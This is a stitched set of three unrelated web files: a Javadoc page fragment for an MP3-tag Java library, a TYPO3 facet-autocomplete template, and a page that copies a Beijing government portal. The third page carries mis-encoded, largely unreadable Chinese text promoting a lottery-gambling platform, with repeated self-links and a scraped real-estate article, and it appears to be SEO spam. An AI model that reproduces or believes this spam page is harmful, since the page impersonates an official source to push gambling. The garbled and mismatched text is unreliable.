HREF="../../../../org/farng/mp3/lyrics3/Lyrics3v1.html#append(org.farng.mp3.AbstractMP3Tag)">append</A></B>(<A HREF="../../../../org/farng/mp3/AbstractMP3Tag.html" title="class in org.farng.mp3">AbstractMP3Tag</A>&nbsp;tag)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;void</CODE></FONT></TD> <TD><CODE><B>Lyrics3v1.</B><B><A HREF="../../../../org/farng/mp3/lyrics3/Lyrics3v1.html#overwrite(org.farng.mp3.AbstractMP3Tag)">overwrite</A></B>(<A HREF="../../../../org/farng/mp3/AbstractMP3Tag.html" title="class in org.farng.mp3">AbstractMP3Tag</A>&nbsp;tag)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;void</CODE></FONT></TD> <TD><CODE><B>Lyrics3v1.</B><B><A HREF="../../../../org/farng/mp3/lyrics3/Lyrics3v1.html#write(org.farng.mp3.AbstractMP3Tag)">write</A></B>(<A HREF="../../../../org/farng/mp3/AbstractMP3Tag.html" title="class in org.farng.mp3">AbstractMP3Tag</A>&nbsp;tag)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> </TABLE> &nbsp; <P> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableSubHeadingColor"> <TD COLSPAN=2>Constructors in <A HREF="../../../../org/farng/mp3/lyrics3/package-summary.html">org.farng.mp3.lyrics3</A> with parameters of type <A HREF="../../../../org/farng/mp3/AbstractMP3Tag.html" title="class in org.farng.mp3">AbstractMP3Tag</A></FONT></TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD><CODE><B><A HREF="../../../../org/farng/mp3/lyrics3/Lyrics3v2.html#Lyrics3v2(org.farng.mp3.AbstractMP3Tag)">Lyrics3v2</A></B>(<A HREF="../../../../org/farng/mp3/AbstractMP3Tag.html" title="class in org.farng.mp3">AbstractMP3Tag</A>&nbsp;mp3tag)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Creates a new Lyrics3v2 object.</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD><CODE><B><A HREF="../../../../org/farng/mp3/lyrics3/Lyrics3v1.html#Lyrics3v1(org.farng.mp3.AbstractMP3Tag)">Lyrics3v1</A></B>(<A HREF="../../../../org/farng/mp3/AbstractMP3Tag.html" title="class in org.farng.mp3">AbstractMP3Tag</A>&nbsp;mp3Tag)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Creates a new Lyrics3v1 object.</TD> </TR> </TABLE> &nbsp; <P> <HR> <!-- ======= START OF BOTTOM NAVBAR ====== --> <A NAME="navbar_bottom"><!-- --></A> <A HREF="#skip-navbar_bottom" title="Skip navigation links"></A> <TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY=""> <TR> <TD COLSPAN=3 BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A NAME="navbar_bottom_firstrow"><!-- --></A> <TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY=""> <TR ALIGN="center" VALIGN="top"> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../org/farng/mp3/AbstractMP3Tag.html" title="class in org.farng.mp3"><FONT CLASS="NavBarFont1"><B>Class</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> &nbsp;<FONT CLASS="NavBarFont1Rev"><B>Use</B></FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A>&nbsp;</TD> </TR> </TABLE> </TD> <TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM> </EM> </TD> </TR> <TR> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> &nbsp;PREV&nbsp; &nbsp;NEXT</FONT></TD> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> <A HREF="../../../../index.html" target="_top"><B>FRAMES</B></A> &nbsp; &nbsp;<A HREF="AbstractMP3Tag.html" target="_top"><B>NO FRAMES</B></A> &nbsp; &nbsp;<SCRIPT type="text/javascript"> <!-- if(window==top) { document.writeln('<A HREF="../../../../allclasses-noframe.html"><B>All Classes</B></A>'); } //--> </SCRIPT> <NOSCRIPT> <A HREF="../../../../allclasses-noframe.html"><B>All Classes</B></A> </NOSCRIPT> </FONT></TD> </TR> </TABLE> <A NAME="skip-navbar_bottom"></A> <!-- ======== END OF BOTTOM NAVBAR ======= --> <HR> <i>Copyright (c) 2004 Eric Farng</i> </BODY> </HTML>
Resources/Private/Partials/Facets/Facet/List/Autocomplete.html
subugoe/typo3-find
{namespace s=Subugoe\Find\ViewHelpers} <f:comment> Uses the facet items to create a popup menu with an autocomplete field to let the user easily find a specific item in the facet and use it as a filter. You need to configure your page to load the required JavaScript library (jQuery.chosen) to make it work. See the Readme for details. </f:comment> <s:page.linkCSS file="https://cdnjs.cloudflare.com/ajax/libs/chosen/1.6.2/chosen.css"/> <s:page.script name="chosen" file="https://cdnjs.cloudflare.com/ajax/libs/chosen/1.6.2/chosen.jquery.min.js"/> <f:alias map="{translateArguments:'{0:\"{f:translate(key:\'LLL:{settings.languageRootPath}locallang-facets.xml:facet.{facetInfo.id}\', default:facetInfo.id)}\"}'}"> <form> <f:form.select options="{s:find.selectOptionsForFacet( values:facetData.values, leadingBlank:1, sortByName:1, sortPrefixSeparator:facetInfo.sortPrefixSeparator, localisationPrefix:'LLL:{settings.languageRootPath}locallang-facets.xml:facet.{facetInfo.id}.' )}" class="facetSearch" additionalAttributes="{data-placeholder:'{f:translate(key:\"Filter by %s\", arguments:translateArguments)}'}"/> </form> </f:alias>
logs/meng/q468119.html
ForAEdesWeb/AEW25
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <head> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible"content="IE=9; IE=8; IE=7; IE=EDGE"> <meta http-equiv="Content-Type" content="text/html; charset=gb2312"> <meta name="desCRIPtion" content="±±¾©Èü³µpk10Ö®°ËÂë¹öÑ©Çò¼Æ»®»¶Ó­´ó¼ÒÀ´µ½dld158.comÓéÀÖÆ½Ì¨" /> <title>±±¾©Èü³µpk10Ö®°ËÂë¹öÑ©Çò¼Æ»®_±±¾©Èü³µpk10Ö®°ËÂë¹öÑ©Çò¼Æ»®-dld158ÓéÀÖ{°Ù¶ÈÐÂÎÅ}°Ù¶ÈÈÏÖ¤</title> <!--ÈÈÁ¦Í¼¿ªÊ¼--> <meta name="uctk" content="enabled"> <!--ÈÈÁ¦Í¼½áÊø--> <meta name="keywords" content="±±¾©Èü³µpk10Ö®°ËÂë¹öÑ©Çò¼Æ»®"/> <meta name="desCRIPtion" content="»¶Ó­´ó¼ÒÀ´µ½dld158.comÓéÀÖÆ½Ì¨"/> <meta name="sitename" content="Ê×¶¼Ö®´°-±±¾©ÊÐÕþÎñÃÅ»§ÍøÕ¾"> <meta name="siteurl" content="http://www.beijing.gov.cn"> <meta name="district" content="±±¾©" > <meta name="filetype" content="0"> <meta name="publishedtype" content="1"> <meta name="pagetype" content="2"> <meta name="subject" content="28428;1"> <!-- Le styles --> <link href="http://www.beijing.gov.cn/images/zhuanti/xysym/bootstrap150609.css" rel="stylesheet"> <link href="http://www.beijing.gov.cn/images/zhuanti/xysym/bootstrap-responsive150609.css" rel="stylesheet"> <style> body { background:#E8E8E8; /* 60px to make the container go all the way to the bottom of the topbar */ } .navbar .btn-navbar { position:absolute; right:0; margin-top:50px;} #othermessage p {width:50%;} #othermessage dl { width:50%;} #breadcrumbnav ul { width:100%;} #breadcrumbnav ul li { line-height:14px; font-family:"ËÎÌå"; padding:0px 10px; margin:0; background:none; } #othermessage span { padding:0px 10px;} #footer { margin:20px -20px 0px -20px;} .navbar .nav li a { font-family:"Microsoft YaHei";} #div_zhengwen { font-family:"SimSun";} #div_zhengwen p{ font-family:"SimSun"; padding:0;} select { width:75px; float:left; height:35px;} .search .input{ border:1px solid #c1c1c1; width:290px;} .bdsharebuttonbox { float:left; width:80%;} .navbar .nav li a { padding: 10px 48px 11px 49px;} .nav_weather span { float:right;} #footer { position:absolute; left:0; right:0; margin:20px 0 0 0;} #essaybottom {font-family:"simsun"; } #pic { text-align:center; } #pic ul { padding-top:10px; display:none; } #pic li {font-family:"SimSun";} .content_text h1 {line-height:150%;} .version { float:right; padding:48px 50px 0 0} .search { padding: 50px 0 0 70px;} .nav_weather a { font-family:simsun;} .version li a { font-family:simsun;} .footer-class { font-family:simsun;} @media only screen and (max-width: 480px) { #pic img { width:100%;} } @media only screen and (max-width: 320px) { #pic img { width:100%;} } @media only screen and (max-width: 640px) { #pic img { width:100%;} } #filerider .filelink {font-family:"SimSun";} #filerider .filelink a:link { color:#0000ff; font-family:"SimSun";} </style> <sCRIPt type="text/javasCRIPt"> var pageName = "t1424135"; var pageExt = "htm"; var pageIndex = 0 + 1; var pageCount = 1; function getCurrentPage() { document.write(pageIndex); } function generatePageList() { for (i=0;i<1;i++) { var curPage = i+1; document.write('<option value=' + curPage); if (curPage == pageIndex) document.write(' selected'); document.write('>' + curPage + '</option>'); } } function preVious(n) { if (pageIndex == 1) { alert('ÒѾ­ÊÇÊ×Ò³£¡'); } else { getPageLocation(pageIndex-1); } } function next(n) { if (pageIndex == pageCount) { alert('ÒѾ­ÊÇβҳ£¡'); } else { nextPage(pageIndex); } } function nextPage(page) { var gotoPage = ""; if (page == 0) { gotoPage = pageName + "." + pageExt; } else { gotoPage = pageName + "_" + page + "." + pageExt; } location.href = gotoPage; } function getPageLocation(page) { var gotoPage = ""; var tpage; if (page == 1) { gotoPage = pageName + "." + pageExt; } else { tpage=page-1; gotoPage = pageName + "_" + tpage + "." + pageExt; } location.href = gotoPage; } </sCRIPt> <SCRIPT type=text/javasCRIPt> function $(xixi) { return document.getElementById(xixi); } //ת»»×ֺŠfunction doZoom(size){ if(size==12){ $("contentText").style.fontSize = size + "px"; $("fs12").style.display = ""; $("fs14").style.display = "none"; $("fs16").style.display = "none"; } if(size==14){ $("contentText").style.fontSize = size + "px"; $("fs12").style.display = "none"; $("fs14").style.display = ""; $("fs16").style.display = "none"; } if(size==16){ $("contentText").style.fontSize = size + "px"; $("fs12").style.display = "none"; $("fs14").style.display = "none"; $("fs16").style.display = ""; } } </SCRIPT> <!-- Le HTML5 shim, for IE6-8 support of HTML5 elements --> <!--[if lt IE 9]> <sCRIPt src="//html5shim.googlecode.com/svn/trunk/html5.js"></sCRIPt> <![endif]--> <!-- Le fav and touch icons --> <link rel="shortcut icon" href="images/favicon.ico"> <link rel="apple-touch-icon" href="images/apple-touch-icon.png"> <link rel="apple-touch-icon" sizes="72x72" href="images/apple-touch-icon-72x72.png"> <link rel="apple-touch-icon" sizes="114x114" href="images/apple-touch-icon-114x114.png"> <sCRIPt type="text/javasCRIPt"> window.onload = function(){ var picurl = [ "", "", "", "", "", "", "", "", "", "" ]; var i=0; for(i=0;i<picurl.length;i++) { picurl[i].index=i; if(picurl[i]!="") { document.getElementById("pic_"+i).style.display = "block"; } } } </sCRIPt> </head> <body> <div class="navbar navbar-fixed-top"> <div class="navbar-inner"> <div class="nav_weather"> <div class="container"><a href="http://zhengwu.beijing.gov.cn/sld/swld/swsj/t1232150.htm" title="ÊÐί" target="_blank">ÊÐί</a> | <a href="http://www.bjrd.gov.cn/" title="ÊÐÈË´ó" target="_blank">ÊÐÈË´ó</a> | <a href="http://www.beijing.gov.cn/" title="ÊÐÕþ¸®" target="_blank">ÊÐÕþ¸®</a> | <a href="http://www.bjzx.gov.cn/" title="ÊÐÕþЭ" target="_blank">ÊÐÕþЭ</a></div> </div> <div class="container"> <a class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </a> <div class="span12"> <a class="brand" href="http://www.beijing.gov.cn/"><img src="http://www.beijing.gov.cn/images/zhuanti/xysym/logo.png" /></a> <div class="search"> <sCRIPt language="JavaScript" type="text/javasCRIPt"> function checkForm(){ var temp = searchForm.temp.value; var database = searchForm.database.value; if(temp==null || temp==""){ alert("ÇëÊäÈëËÑË÷Ìõ¼þ"); } else{ var url="http://so.beijing.gov.cn/Query?qt="+encodeURIComponent(temp)+"&database="+encodeURIComponent(database); window.open(url); } return false; } </sCRIPt> <form id="search" method="get" name="searchForm" action="" target="_blank" onSubmit="return checkForm()"> <input type="hidden" value="bj" id="database" name="database" /> <input name="temp" id="keyword" type="text" value="È«ÎÄËÑË÷" class="input" title="È«ÎÄËÑË÷¹Ø¼ü×Ö" /> <input id="searchbutton" type="image" src="http://www.beijing.gov.cn/images/zhuanti/xysym/search_btn.gif" width="66" height="35" title="µã»÷ËÑË÷" alt="ËÑË÷" /> </form> </div> <div class="version"><ul> <li><a title="ÎÞÕϰ­" href="http://wza.beijing.gov.cn/" target="_blank" id="yx_style_nav">ÎÞÕϰ­</a></li> <li><a target="_blank" title="·±Ìå°æ" href="http://210.75.193.158/gate/big5/www.beijing.gov.cn">·±Ìå</a></li> <li><a target="_blank" title="¼òÌå°æ" href="http://www.beijing.gov.cn">¼òÌå</a></li> <li class="last"><a target="_blank" title="English Version" href="http://www.ebeijing.gov.cn">English</a></li></ul><ul> <li><a href="javasCRIPt:void(0)" onclick="SetHome(this,window.location)" title="ÉèΪÊ×Ò³">ÉèΪÊ×Ò³</a></li> <li><a title="¼ÓÈëÊÕ²Ø" href="javasCRIPt:void(0)" onclick="shoucang(document.title,window.location)">¼ÓÈëÊÕ²Ø</a></li> <li class="last"><a target="_blank" title="ÒÆ¶¯°æ" href="http://www.beijing.gov.cn/sjbsy/">ÒÆ¶¯°æ</a></li></ul></div> </div> </div> <div class="nav-collapse"> <div class="container"> <ul class="nav"> <li ><a href="http://www.beijing.gov.cn/" class="normal" title="Ê×Ò³">Ê×Ò³</a></li> <li><a href="http://zhengwu.beijing.gov.cn/" class="normal" title="ÕþÎñÐÅÏ¢">ÕþÎñÐÅÏ¢</a></li> <li><a href="http://www.beijing.gov.cn/sqmy/default.htm" class="normal" title="ÉçÇéÃñÒâ">ÉçÇéÃñÒâ</a></li> <li><a href="http://banshi.beijing.gov.cn" class="normal" title="ÕþÎñ·þÎñ">ÕþÎñ·þÎñ</a></li> <li><a href="http://www.beijing.gov.cn/bmfw" class="normal" title="±ãÃñ·þÎñ">±ãÃñ·þÎñ</a></li> <li style="background:none;"><a href="http://www.beijing.gov.cn/rwbj/default.htm" class="normal" title="ÈËÎı±¾©">ÈËÎı±¾©</a></li> </ul> </div> </div><!--/.nav-collapse --> </div> </div> </div> <div class="container" style="background:#fff; margin-top:24px;"> <div class="content_text"> <div id="breadcrumbnav"> <ul> <li>Ê×Ò³¡¡>¡¡±ãÃñ·þÎñ¡¡>¡¡×îÐÂÌáʾ</li> </ul> <div class="clearboth"></div> </div> <h1>±±¾©Èü³µpk10Ö®°ËÂë¹öÑ©Çò¼Æ»® <div id="othermessage"> <p> <span>À´Ô´£º±±¾©ÈÕ±¨</span> <span>ÈÕÆÚ£º2017-04-21 17:31:05</span></p> <dl> <sCRIPt language='JavaScript' type="text/javasCRIPt"> function changeSize(size){document.getElementById('div_zhengwen').style.fontSize=size+'px'}</sCRIPt> ¡¾×ÖºÅ&nbsp;&nbsp;<a href='javasCRIPt:changeSize(18)' style="font-size:16px;">´ó</a>&nbsp;&nbsp;<a href='javasCRIPt:changeSize(14)' style="font-size:14px;">ÖÐ</a>&nbsp;&nbsp;<a href='javasCRIPt:changeSize(12)' style="font-size:12px;">С</a>¡¿</dl> </div> </h1> <div id="div_zhengwen"> <div id="pic"> <ul id="pic_0"> <li><img src="" border="0" alt="" title="" /></li> <li></li> </ul> <ul id="pic_1"> <li><img src="" border="0" alt="" title="" /></li> <li></li> </ul> <ul id="pic_2"> <li><img src="" border="0" alt="" title="" /></li> <li></li> </ul> <ul id="pic_3"> <li><img src="" border="0" alt="" title="" /></li> <li></li> </ul> <ul id="pic_4"> <li><img src="" border="0" alt="" title="" /></li> <li></li> </ul> <ul id="pic_5"> <li><img src="" border="0" alt="" title="" /></li> <li></li> </ul> <ul id="pic_6"> <li><img src="" border="0" alt="" title="" /></li> <li></li> </ul> <ul id="pic_7"> <li><img src="" border="0" alt="" title="" /></li> <li></li> </ul> <ul id="pic_8"> <li><img src="" border="0" alt="" title="" /></li> <li></li> </ul> <ul id="pic_9"> <li><img src="" border="0" alt="" title="" /></li> <li></li> </ul> </div> <div class=TRS_Editor><p align="justify">¡¡¡¡±±¾©Èü³µpk10Ö®°ËÂë¹öÑ©Çò¼Æ»® »¶Ó­´ó¼ÒÀ´µ½dld158.comÓéÀÖÆ½Ì¨</p> <img src="{img}" width="300" height="330"/> <p align="justify">¡¡¡¡<a href="http://sapience.com.tw/logs/meng/q6732150.html">±±¾©Èü³µpk10Ö®°ËÂë¹öÑ©Çò¼Æ»®</a></p>±±¾©Èü³µpk10Ö®°ËÂë¹öÑ©Çò¼Æ»® <p align="justify">¡¡¡¡<a href="http://sapience.com.tw/logs/meng/q7611177.html">±±¾©Èü³µpk10Ö®°ËÂë¹öÑ©Çò¼Æ»®</a></p>±±¾©Èü³µpk10Ö®°ËÂë¹öÑ©Çò¼Æ»® <p align="justify">¡¡¡¡<a href="http://sapience.com.tw/logs/meng/q4622640.html">±±¾©Èü³µpk10Ö®°ËÂë¹öÑ©Çò¼Æ»®</a></p>±±¾©Èü³µpk10Ö®°ËÂë¹öÑ©Çò¼Æ»® <p align="justify">¡¡¡¡<a href="http://sapience.com.tw/logs/meng/q2642508.html">±±¾©Èü³µpk10Ö®°ËÂë¹öÑ©Çò¼Æ»®</a></p>±±¾©Èü³µpk10Ö®°ËÂë¹öÑ©Çò¼Æ»® <p align="justify">¡¡¡¡<a href="http://sapience.com.tw/logs/meng/q8622420.html">±±¾©Èü³µpk10Ö®°ËÂë¹öÑ©Çò¼Æ»®</a></p>±±¾©Èü³µpk10Ö®°ËÂë¹öÑ©Çò¼Æ»® <p align="justify">¡¡¡¡ <p>¡¡¡¡3ÔÂÄ©£¬Ãܼ¯µÄÒµ¼¨·¢²¼»á£¬ÈÃÉÏÊз¿ÆóÖðÒ»½»³ö³É¼¨µ¥¡£´ó²¿·Ö·¿Æóƾ½èÔö³¤µÄºÏͬÏúÊ۶ÒÔ¼°¿íËɵÄÏÖ½ðÁ÷£¬È¡µÃÀúÊ·×îºÃÒµ¼¨¡£µ«Í¬Ê±£¬ÐÐÒµ¾Þ±ä£¬ÍÁµØ¼Û¸ñ·ÉÕÇ¡¢½¨°²³É±¾Ôö¼Ó¡¢Æµ·±µÄÕþ²ßµ÷¿ØºÍ¼Û¸ñ¹ÜÖÆÏ£¬·¿Æó´ø×ŹæÄ£Ò»Â·¿ñ±¼µÄ±³¾°Ï£¬ÀûÈó¿Õ¼äÒ»ÔÙ±»Ñ¹Ëõ¡£</p> <p>¡¡¡¡ÖÐÖ¸ÔºÊý¾ÝÏÔʾ£¬Öйú°ÙÇ¿·¿ÆóµÄ¾»ÀûÈóÂʳÖÐø×ߵͣ¬2016Äê½öΪ11%¡£»Æ½ðÊ®Äê½áÊø£¬Öйú·¿µØ²úÒµµÄ±©Àûʱ´ú¹ýÈ¥ÁË¡£</p> <p>¡¡¡¡Ãæ¶ÔδÀ´£¬Ñ°ÇóÓÐÖÊÁ¿µÄÔö³¤£¬³ÉΪԽÀ´Ô½¶à·¿ÆóµÄËßÇó¡£½ñÄê³õ£¬ºã´ó¼¯ÍÅ(03333.HK)¶­Ê¾ÖÔÚ¹«Ë¾ÄÚ²¿»áÒéÉÏÌá³ö£¬¹«Ë¾Õ½ÂÔ½«´Ó¡°¹æÄ£¡±Ôö³¤Öð²½×ªÏò¡°¹æÄ£+Ð§Òæ¡±µÄË«Ôö³¤¡£ÕâÔÚÒ»¶¨³Ì¶ÈÉϵ춨ÁËÕâ¼Ò¹æÄ£µÚÒ»µÄ·¿Æó¡°Êʵ±¿ØËÙ¡±µÄδÀ´»ùµ÷¡£</p> <p>¡¡¡¡´Ó2016ÄêϰëÄ꿪ʼ£¬Ô½À´Ô½¶àµÄÆóÒµÒòΪÎÞ·¨»ñµÃÓÐЧµÄÀûÈ󻨱¨¶øÑ¡ÔñÍ˳ö·¿µØ²ú¿ª·¢ÐÐÒµ¡£ÁôÏµķ¿ÆóÐèÒªÒ»¿Å¸ü¼áÇ¿µÄÄںˣ¬ËüÊdzɱ¾¿ØÖÆÄÜÁ¦ºÍÀûÈó¿Õ¼äÍØÕ¹ÄÜÁ¦µÄÌåÏÖ£¬ÒÔÔöÊÕÓÖÔöÀûΪÂä½Åµã¡£</p> <p style="text-align: center;"><img src="http://img.mp.itc.cn/upload/20170329/47a87f5cdc4e47e48b42c0882a34f2c1_th.jpg" alt="" style="max-width:600px;" /></p> <p>¡¡¡¡<strong>ÀûÈóÏ»¬Ç÷ÊÆÒÀ¾É</strong></p> <p>¡¡¡¡ËäÈ»2016ÄêµÄ·¿µØ²úÐÐÒµÒ»ÅÉ·±ÈÙ£¬ÆóÒµÃǺ°Á˺ܶàÄêµÄÌáÉýÀûÈóÂʵÄÄ¿±ê£¬²¢Ã»ÓÐÆÕ±éʵÏÖ¡£</p> <p>¡¡¡¡ÖÐÖ¸Ôº±¨¸æÖ¸³ö£¬2016Ä꣬°ÙÇ¿·¿ÆóÏúÊÛ¹æÄ£ÔÙÉÏÐĄ̂½×£¬ÏúÊÛ×ܶÏúÊÛÃæ»ý·Ö±ð´ï48027.1ÒÚÔª¡¢40251.7Íòƽ·½Ã×£¬Í¬±ÈÔö³¤52.5%ºÍ39.4%¡£ÏúÊÛÒµ¼¨µÄ¿ìËÙÔö³¤´ø¶¯ÁËÓªÊÕ¡¢ÀûÈó¹æÄ£µÄÌáÉý¡£°ÙÇ¿·¿ÆóµÄÓªÒµÊÕÈë¾ùÖµ´ï392.1ÒÚÔª£¬¾»ÀûÈó¾ùÖµ´ï45.7ÒÚÔª£¬Í¬±È·Ö±ðÔö³¤36.8%¡¢26.2%¡£</p> <p>¡¡¡¡µ«°ÙÇ¿·¿Æó¾»ÀûÈóÔö³¤ÂÊÈÔµÍÓÚÓªÒµÊÕÈëÔö³¤ÂÊ10.6¸ö°Ù·Öµã£¬ÐÐÒµ¡°ÔöÊÕ²»ÔöÀû¡±ÏÖÏóÒÀȻ͹ÏÔ¡£ÖÐÖ¸ÔºÊý¾ÝÏÔʾ£¬2016Äê°ÙÇ¿·¿Æó¾»ÀûÈóÂÊÒò¹æÄ£ºÍ×ÛºÏʵÁ¦µÄ²îÒì³ÊÏÖ³öÖ𼶵ݼõµÄÇ÷ÊÆ£¬Ç°10ÆóÒµ¡¢11¡«30ÆóÒµ¡¢31¡«50ÆóÒµ¡¢51¡«100ÆóÒµµÄ¾»ÀûÈóÂʾùÖµ·Ö±ðΪ13.6%¡¢12.4%¡¢11.6%¡¢10.4%¡£ÖÁÓÚ¾»ÀûÈóÂʾùÖµ£¬Ôò³ÖÐø×ßµÍÖÁ11.0%£¬½ÏÉÏÄêϽµ0.5¸ö°Ù·Öµã¡£</p> <p>¡¡¡¡¶àÄêÎȾӾ»ÀûÈó°ñ°ñÊ׵ľ»ÀûÈóÒ»¸çÖк£µØ²ú(00688.HK)ÒàδÄÜÐÒÃâ¡£Öк£Ä걨ÏÔʾ£¬Öк£2016Äê¹éÊôÉÏÊй«Ë¾¹É¶«¾»ÀûÈóΪ370.2ÒÚ¸ÛÔª¡£¹ýÈ¥ËÄÄ꣬¼´´Ó2012¡«2015Ä꣬Öк£¾»ÀûÈó·Ö±ðΪ187.2ÒÚ¸ÛÔª¡¢230.4ÒÚ¸ÛÔª¡¢276.8ÒÚ¸ÛÔª¡¢333.1ÒÚ¸ÛÔª£¬Í¬±ÈÔö·ù·Ö±ðΪ24.5%¡¢23%¡¢20.1%¡¢20.3%¡£ºÏ²¢ÖÐÐÅÖØÐ¼ÆËã²ÆÎñÊý¾Ýºó£¬2016ÄêÖк£¾»ÀûÈóµÄÔö·ùÖ»ÓÐ6.9%£¬ÔöËÙÖè½µ¡£Èç¹ûÌÞ³ýÖÐÐŵÄÓ°Ï죬2016ÄêµÄ¾»ÀûÈóͬ±ÈÔö·ùΪ14%¡£¾¡¹ÜÈç´Ë£¬»¹ÊǵøÆÆÁË20%µÄ¾»ÀûÈóÔö³¤ÂʺìÏß¡£</p> <p>¡¡¡¡ÐÐÒµÓ¯ÀûÔö³¤Ï½µ£¬ÔçÔÚ2013Äê³õÏÖ¶ËÄß¡£ËäÈ»´ó¶àÊýÆóÒµ¶¼ÒѽÓÊÜÕâÒ»Ç÷ÊÆ²¢ÊÔͼͨ¹ý¼ÓÇ¿ÄÚ²¿¹Ü¿Ø¡¢½µµÍ³É±¾µÈ·½Ê½Äæ×ª¾ÖÃæ£¬µ«½ØÖÁĿǰ£¬ÒÀȻûÓгöÏÖÀÖ¹Û¼£Ïó¡£</p> <p>¡¡¡¡Íò¿Æ(000002.SZ)Ä걨Êý¾ÝÏÔʾ£¬2016Ä꣬Íò¿ÆÊµÏÖÏúÊÛ½ð¶î3647.7ÒÚÔª£¬Í¬±ÈÔö³¤39.5%£¬ÓªÒµÊÕÈë2404.8ÒÚÔª£¬Ôö³¤23%£¬¹éÊôÓÚÉÏÊй«Ë¾¹É¶«µÄ¾»ÀûÈó½öΪ210.2ÒÚÔª£¬Ôö³¤16%¡£ÔÚÏúÊÛ°ñµÄǰÈýÃû£¬ºã´ó¡¢Íò¿Æ¡¢±Ì¹ðÔ°(02007.HK)³ÊÏÖÀàËÆ×ßÊÆ£¬¼´¾»ÀûÈóÔö³¤Ëٶȸú²»ÉÏÓªÊÕÔöËÙ£¬¸ü¸ú²»ÉϺÏͬÏúÊÛ½ð¶îÔöËÙ£¬ÏÔʾһÏßÕóÓªµÄÀûÈóûÓÐÓë¹æÄ£Í¬±ÈÔö³¤£¬Ó¯ÀûˮƽÈÔÔÚ×ߵ͡£</p> <p>¡¡¡¡Í¬²ß×ÉѯÑо¿²¿×ܼàÕźêΰ¶ÔµÚÒ»²Æ¾­¼ÇÕ߳ƣ¬´Ó2015Ä꿪ʼ£¬·¿ÆóÒÔ¹æÄ£Ôö³¤ÎªÖ÷Òª·¢Õ¹Ä¿±ê£¬¼´Ê¹½ñÄêÕþ²ßƵ·±¡¢ÐÐÇé²»ºÃ£¬µ«¶àÊý·¿ÆóͬÑù¶¨ÏÂÔöËÙΪ20%ÉõÖÁÒÔÉϵÄÏúÊÛÄ¿±ê¡£</p> <p>¡¡¡¡ÕźêΰÈÏΪ£¬¡°ÆóÒµÒÔÎþÉüÀûÈóΪ´ú¼Û£¬Íƶ¯¹æÄ£µÄÔö³¤¡£ËäÈ»ÖÜתÂÊÔ½À´Ô½¸ß£¬µ«ÀûÈóÂÊÈ´ÖðÄêϽµ¡£¡±ÕâÇ¡ÄܽâÊÍ£¬ÎªºÎ2016Äê¹úÄÚÏúÊÛ½ð¶îǰÈýÃû¡¢½øÈë3000ÒÚÔª¾ãÀÖ²¿µÄºã´ó¡¢Íò¿Æ¡¢±Ì¹ðÔ°£¬È´·Ç¾»ÀûÈóÒ»¸çµÄÏÖÏó¡£</p> <p>¡¡¡¡¡°³ýÁËÆóÒµÖ÷¹Û²ãÃæµÄÎþÉüÀûÈóÒÔÍÆ¶¯¹æÄ£Ôö³¤Í⣬²»¶ÏÉý¸ßµÄÍÁµØ³É±¾ÊÇѹËõÆóÒµÀûÈóµÄÖ÷ÒªÔ­Òò¡£¡±Õźêΰ±íʾ¡£</p> <p style="text-align: center;"><img src="http://img.mp.itc.cn/upload/20170329/e20ea896768c4f9dabf61616cfdf4a87_th.jpg" alt="" style="max-width:600px;" /></p> <p>¡¡¡¡<strong>¹æÄ£ÓëÐ§ÒæµÄÈ¡Éá</strong></p> 